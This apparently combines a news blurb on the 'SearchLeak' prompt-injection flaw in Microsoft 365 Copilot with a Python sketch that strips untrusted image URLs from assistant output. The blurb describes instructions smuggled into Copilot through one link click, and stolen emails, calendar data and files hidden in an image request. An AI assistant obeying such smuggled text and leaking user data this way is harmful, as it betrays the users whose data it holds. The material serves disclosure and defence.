One click on a normal Microsoft link and Copilot quietly ships emails, calendar, and files to an attacker. No password, no second click. Varonis disclosed this
A security vulnerability dubbed "SearchLeak" has been disclosed, affecting Microsoft 365 Copilot Enterprise Search. This flaw allows attackers to exfiltrate emails, calendar data, and files with a single click on a malicious link, bypassing standard security measures. The exploit smuggles instructions into Copilot, which then hides the stolen data within an image request. While Microsoft has implemented a server-side mitigation, the vulnerability highlights potential risks associated with AI-powered productivity tools.
AI IMPACT: Highlights potential data exfiltration risks in AI-integrated productivity suites, necessitating robust security measures.
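
A defensive sketch for the image-request channel described above, added here as an example (not code from Varonis or Microsoft): before assistant output is rendered, it removes image references unless they are https URLs on an allowlisted host with a short query string. The markdown and HTML image syntaxes, the allowlist, the 64-character threshold, the function names and the sample text are all assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only hosts this deployment lets rendered answers load images from.
ALLOWED_IMAGE_HOSTS = {"res.cdn.example.com"}
# Assumption: legitimate image URLs here never need a longer query string.
MAX_QUERY_CHARS = 64

# Image references in markdown (![alt](url)) and in HTML (<img src=...>).
IMG_PATTERNS = [
    re.compile(r'!\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)'),
    re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I),
]

def classify_image_url(url):
    """Return the reason a URL must not be fetched, or None if it is acceptable."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "unparseable URL"
    if parts.scheme != "https":          # also rejects //host/... and http:
        return "not an https URL"
    if (parts.hostname or "").lower() not in ALLOWED_IMAGE_HOSTS:
        return "host not on allowlist"
    if len(parts.query) > MAX_QUERY_CHARS:
        return "oversized query string"  # data can ride in the query even on a trusted host
    return None

def sanitize_model_output(text):
    """Strip disallowed image references; return (clean_text, [(url, reason), ...])."""
    findings = []

    def _replace(match):
        reason = classify_image_url(match.group(1))
        if reason is None:
            return match.group(0)
        findings.append((match.group(1), reason))
        return "[image removed]"

    for pattern in IMG_PATTERNS:
        text = pattern.sub(_replace, text)
    return text, findings

# Constructed sample of assistant output; none of these URLs come from the disclosure.
SAMPLE = (
    "Here is your summary.\n"
    "![logo](https://res.cdn.example.com/logo.png)\n"
    "![status](https://untrusted.example/p.png?d=c3ViamVjdDogUTMgYnVkZ2V0)\n"
    '<img src="//untrusted.example/t.gif?x=1" alt="">\n'
)

if __name__ == "__main__":
    clean, found = sanitize_model_output(SAMPLE)
    print(clean)
    for url, reason in found:
        print("blocked:", reason, url)
```

The findings list is worth logging: a blocked image URL in assistant output is a signal that injected instructions reached the model, even though the request itself was never made.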